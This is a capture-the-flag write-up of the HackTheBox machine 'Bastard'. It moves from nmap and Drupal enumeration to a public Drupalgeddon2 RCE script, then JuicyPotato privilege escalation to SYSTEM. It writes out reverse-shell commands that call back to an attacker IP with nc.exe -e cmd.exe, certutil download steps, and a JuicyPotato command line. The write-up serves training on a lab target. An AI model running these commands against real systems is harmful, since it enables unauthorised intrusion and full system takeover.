Pentest Everything
GitHubSupport Pentest Everything
  • ⚔️Pentest Everything
  • 🚩Writeups
    • CyberSecLabs
      • Active Directory
        • Dictionary
        • Spray (WIP)
      • Linux
        • Shock
        • Pie
      • Windows
        • Brute
        • Deployable
        • Glass
        • Monitor
        • Sam
        • Secret
        • Stack
        • Unattended
        • Weak
    • HackTheBox
      • Active Directory
        • Active
        • Blackfield
        • Cascade
        • Forest
        • Intelligence
        • Mantis
        • Monteverde
        • Resolute
        • Return
        • Sauna
        • Search
      • Linux
        • Antique
        • Armageddon
        • Backdoor
        • Bashed
        • Cap
        • Cronos
        • Curling
        • Knife
        • Lame
        • Help
        • Horizontall
        • OpenAdmin
        • Poison
        • SolidState
        • Traceback
        • Trick
      • Windows
        • Access
        • Artic
        • Bastard
        • Bastion
        • Bounty
        • Devel
        • Heist
        • Jeeves
        • Jerry
        • Legacy
        • Love
        • Optimum
        • Remote
        • SecNotes
        • Servmon
        • Timelapse
        • Querier
    • PG Play | Vulnhub
      • Linux
        • BBSCute
        • BTRSys2.1
        • Born2root
        • BossPlayersCTF
        • Covfefe
        • Dawn
        • DC5
        • Funbox
        • FunboxEasy
        • FunBoxEasyEnum
        • HackerFest2019
        • Geisha
        • JISCTF
        • My-CMSMS
        • NoName
        • OnSystemShellDredd
        • Photographer
        • Potato
        • PyExp
        • Samurai
        • SunsetDecoy
        • SunsetMidnight
        • SunsetTwilight
        • Wpwn
    • PG Practice
      • Linux
        • ClamAV
        • Nibbles
        • Payday
        • Pelican
        • Peppo
        • Postfish
        • Pwned1
        • Snookums
        • Sirol
        • Sorcerer
        • Quackerjack
        • WebCal
        • Walla
        • ZenPhoto
        • Zino
      • Windows
        • Algernon
        • Compromised
        • Kevin
        • Helpdesk
        • Hutch
        • Jacko
        • Meathead
        • Metallus
        • Shenzi
        • Slort
        • UT99
    • TryHackMe
      • Linux
        • All in One
        • Archangel
        • Anonforce
        • Biblioteca
        • Cat Pictures
        • Chill Hack
        • CMesS
        • ColddBox
        • ConvertMyVideo
        • CyberHeroes
        • Cyborg
        • Dav
        • Fusion Corp
        • GamingServer
        • Gallery
        • Internal
        • Jacobtheboss
        • Kiba
        • LazyAdmin
        • Library
        • Madness
        • Marketplace
        • Mustacchio
        • NerdHerd
        • Oh My WebServer
        • Olympus
        • Plotted-TMS
        • Skynet
        • Startup
        • Surfer
        • Team
        • Tech_Supp0rt: 1
        • Tomghost
        • VulnNet
        • Undiscovered
        • Year of the Owl
      • Windows
        • Blueprint
        • Enterprise
        • Flatline
        • Quotient
        • RazorBlack
        • Relevant
        • USTOUN
        • VulnNet: Roasted
    • To Do
      • AllSignsPoint2Pwnage (WIP)
      • Hunit (WIP)
      • Escape (WIP)
      • Banzai (WIP)
      • Billyboss (WIP)
      • Fish
      • Ra
      • Roquefort (WIP)
  • 💾GitHub
  • 🔵PsMapExec
    • Change Log
    • BloodHound
    • Using Credentials
    • Cross Domain Usage
    • Methods
      • Command Execution
      • DCSync
      • GenRelayList / SMB Signing
      • Inject
      • IPMI
      • Kerberoast
      • MSSQL
      • Session Hunter
      • Spray
    • Modules
      • Amnesiac
      • ConsoleHistory
      • Files
      • FileZilla
      • KerbDump
      • eKeys
      • LDAP / LDAPS
      • LogonPasswords
      • LSA
      • MDF
      • NTDS
      • Notepad
      • NTLM
      • SAM
      • SCCM
      • SessionExec
      • SessionRelay
      • SSH
      • TGTDeleg
      • VNC
      • Wi-Fi
      • WinSCP
    • Target Acquisition
  • Everything
    • Buffer Overflow Guide
    • Everything Active Directory and Windows
      • Active Directory Enumeration
      • ADCS
        • Enumeration - Certificate Authority
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC6
        • ESC7
        • ESC8
        • ESC9 - WIP
        • ESC11
      • Access Token Manipultion
        • Token Impersonation
        • Create Process with Token
        • 🔨Make and Impersonate Token
        • Parent PID Spoofing
        • 🔨SID-History Injection
      • Adversary-in-the-Middle
        • 🔨LDAP Relay
        • 🔨LLMNR
        • 🔨RDP MiTM
        • 🔨SMB Relay
      • Credential Access
        • Brute Force
          • Password Spraying
        • Credential Dumping
          • LSASS Memory
          • Security Account Manager (SAM)
          • NTDS
          • LSA Secrets
          • Cached Domain Credentials
          • DCSync
            • 🔨DCSync Attack
        • Credentials from Password Stores
          • Credentials from Web Browsers
          • Windows Credential Manager
        • Unsecured Credentials
          • Credentials In Files
          • Credentials in Registry
          • Group Policy Preferences
            • 🔨GPP Passwords
        • 🔨Modify Authentication Process
          • Domain Controller Authentication: Skeleton Key
          • Reversible Encryption
        • Steal or Forge Kerberos Tickets
          • AS-REP Roasting
          • Golden Ticket
          • Kerberoasting
          • Silver Ticket
          • S4U2Self
          • Ticket Aquisition
          • Constrained Delegation
          • Unconstrained Delegation
      • Collection
        • Clipboard Data
        • Audio Capture
      • Defense Evasion
        • Disable and Bypass Defender
        • Impair Defenses
          • Disable Windows Event Logging
          • Impair Command History Logging
          • Disable or Modify System Firewall
        • Indicator Removal
          • Clear Windows Event Logs
          • Clear Command History
          • File Deletion
          • Network Share Connection Removal
          • Timestomp
      • Input Capture
        • Keylogging
      • Lateral Movement
        • PowerShell Remoting
        • Alternate Authentication Material
          • Pass The Hash
          • Pass the Ticket
          • Pass the Password
      • File Execution Methods
      • File Transfer Techniques
      • Forced Coercion
        • URL File Attack
      • LAPS
      • Network Sniffing
      • Persistence
        • AdminSDHolder
        • BITS Jobs
        • Create Account
          • Local Account
          • Domain Account
          • Cloud Account
        • Create or Modify System Process
          • Windows Service
        • Custom SSP
        • DSRM
        • 🔨Persistence Notes
        • Skeleton Key Attack
      • Privilege Escalation
        • Privilege Escalation Checklist
        • DnsAdmin
        • Registry
          • Always Install Elevated
          • AutoRuns
        • Service Exploits
          • Insecure Service Permissions
      • SCCM / MECM
        • Recon
        • CRED-1 - PXE Abuse
        • CRED-2 - Policy Request Credentials
        • CRED-3 - WMI Local Secrets
        • CRED-4 - CIM Repository
        • CRED-5 - MSSQL Database
        • ELEVATE-2 - Client Push
        • TAKEOVER-2
      • Timeroasting
      • Tools
        • BloodHound
    • Everything Linux
      • File Transfer Techniques
      • Linux Privilege Escalation Techniques
      • Privilege Escalation Checklist
      • Shell Upgrades
    • Everything OSINT
      • Discovering Email Addresses
      • Dork Tools
      • Image OSINT
      • Metadata OSINT
      • Password OSINT
      • Phone Number OSINT
      • Search Engine Operators
      • Social Media OSINT Tools
      • OSINT CTFs
      • OSINT VM
      • Username OSINT
    • Everything Web
      • Command Injection
      • Enumeration
      • File Upload
      • Sub Domain Enumeration
      • XSS
    • Host Discovery
    • Pivoting and Portforwarding
    • Ports
      • Nmap Commands for port discovery
      • Port 21 | FTP
      • Port 25 | SMTP
      • Port 53 | DNS
      • Port 88 | Kerberos
      • Ports 111 | 32771 | rpcbind
      • Port 123 | NTP
      • Ports 137 | 138 | 139 | NetBIOS
      • Ports 139 | 445 | SMB
      • Ports 161 | 162 | SNMP
      • Port 389 | LDAP
      • Ports 1099 | Java RMI
      • Ports 2049 | NFS
      • Port 3389 | RDP
      • Ports 8080 | 8180 | Apache Tomcat
    • PowerShell
      • Constrained Language Mode
      • Download and Execution Methods
      • Resources
      • Restricted Mode
  • Resources
    • Cheat Sheets
      • Default Passwords
      • Kerberoast
      • Mimikatz
      • Powerup
    • Hashcat Word lists and Rules
    • Metasploit Modules
    • Misc Snippets
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • Reverse Shell Generator
    • OSINT Tools
    • Weakpass
  • Password Filter DLL
  • Dork Cheatsheet
Powered by GitBook
On this page
  • Nmap
  • HTTP
  • User
  • Privilege Escalation

Was this helpful?

  1. Writeups
  2. HackTheBox
  3. Windows

Bastard

https://www.hackthebox.eu/home/machines/profile/7

Nmap

We can start off running nmap -p- -T4 to quickly enumerate all available ports before running a more thorough scan on the alive ports with nmap -p 80,135,49154 -A -T4.

nmap 10.10.10.9 -p- -T4

PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
49154/tcp open  unknown

nmap 10.10.10.9 -p 80,135,49154 -A -T4

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.88 seconds

HTTP

On port 80 we come to a web server hosting Drupal.

On running standard enumeration we come across robots.txt which has a large list of disallowed entries. I added these into a directory list and run through them with OWASP ZAP to if we can get any HTTP code 200 hits.

The key files here are maintainers.txt and upgrade.txt. Inspecting both of these files can help us conclude it is likely we are on Drupal version 7.

If you have the Wappalyzer extension installed we can also use this to help identify the correct Drupal version.

I also used Drupwn to try and identify a more exact version of Drupal that is running. (More enumeration never hurts) You can find the GitHub link for this in the resources section at the end of the writeup.

We can take this information and run this against searchsploit:

Just to note how important enumeration is here. Running searchsploit as searchsploit drupal 7 returns over thirty potential results on screen where as defining the exact version of 7.54 returns only eight results in searchsploit as shown above.

With the script we have remote command execution using the -c switch. Once downloaded we can run the script with the follow syntax:

python3 exploit.py -c <command>  http://10.10.10.9

As shown below we can test working by running whoami in the script.

Lets see if we can upload netcat and get a reverse shell going. First move over to a directory which has nc.exe (kali comes pre-installed with this) and then run a Python SimpleHTTPServer as per below:

We can now run certutil.exe to download nc.exe from our attacking machine.

Once downloaded set up a netcat listener on the attacking machine with a desired port. In my examples I am using port 5555.

nc -lvp 5555

Now we can run the python exploit again this time calling the nc.exe to connect back to our machine to create a shell.

python3 exploit.py -c "nc.exe -nv 10.10.14.21 5555 -e cmd.exe"  http://10.10.10.9

We now have a reverse shell into the victim machine.

User

From here we can run net user to find user accounts and then attempt to read the user flag on the desktop.

Privilege Escalation

I initially check the systeminfoinformation against windows_exploit_suggester.py and found some potential avenue's of escalation due to missing patches. I also checked the privileges of the account we are running as since we are a service account.

As you can we have the following privilege SeImpersonatePrivilege which is usually assigned to service accounts and is usually vulnerable to Juicy Potato attacks which as far as I am aware is generally only patched in Windows Server 2019 and Windows 10 1809 and later

Given the fact we have the above privilege on a server running Windows 2008 R2 it is probably a juicy Potato attack that will result in privilege escalation.

Once downloaded upload the binary to the server using certutil.exe just as we did earlier when uploading nc.exe except this time we can run the command in our reverse shell. Once downloaded we can start to build the command to gain a reverse shell.

juicypotato.exe -l 1234 -p nc.exe -a " -nv 10.10.14.21 3333 -e cmd.exe" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
  • -l : Create a listening port

  • -p: Program to launch

  • -a: use the following arguments

  • -t: createprocess call: CreateProcessWithTokenW, CreateProcessAsUser, <*> try both

  • -c: <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})

Before running the above command set up a netcat listener on the attacking machine to catch the port in which you have defined.

nc -lvp 3333

Now run the command for JuicyPotato.exe and see if we can catch a reverse shell. You may need to run the command a few times for it to work. If you get the command output [+] CreateProcessWithTokenW OK then you know it has worked but, will need to check your command syntax if you have not caught a shell.

As you can see we have caught a shell as NT AUTHORITY\SYSTEM and can now grab the root.txt.txt flag on the administrators desktop.

Last updated 2 years ago

Was this helpful?

I tried the exploits above both manual and metasploit for "Drupalgeddon" and could not get the scripts to work. At this point I looked further on Google and found an awesome RCE script by pimps

The Juicy Potato binary can be downloaded from here:

In the above example command I passed nc.exe the arguments we used earlier on when gaining initial shell with a different port and for the -c {CLSID} the default BITS did not work for me so instead I defined the wuasrv service CLSID. A CLSID list for multiple Windows version can be found here:

🚩
https://github.com/pimps/CVE-2018-7600
https://github.com/ohpe/juicy-potato/releases
https://github.com/ohpe/juicy-potato/tree/master/CLSID
Drupal on http://10.10.10.9/
maintainers.txt
Wappalyzer extension for Friefox.
Drupwn
searchploit
testing for RCE
locating nc.exe and running a python server
Download nc.exe from our attacking machine.
running juicypotato.exe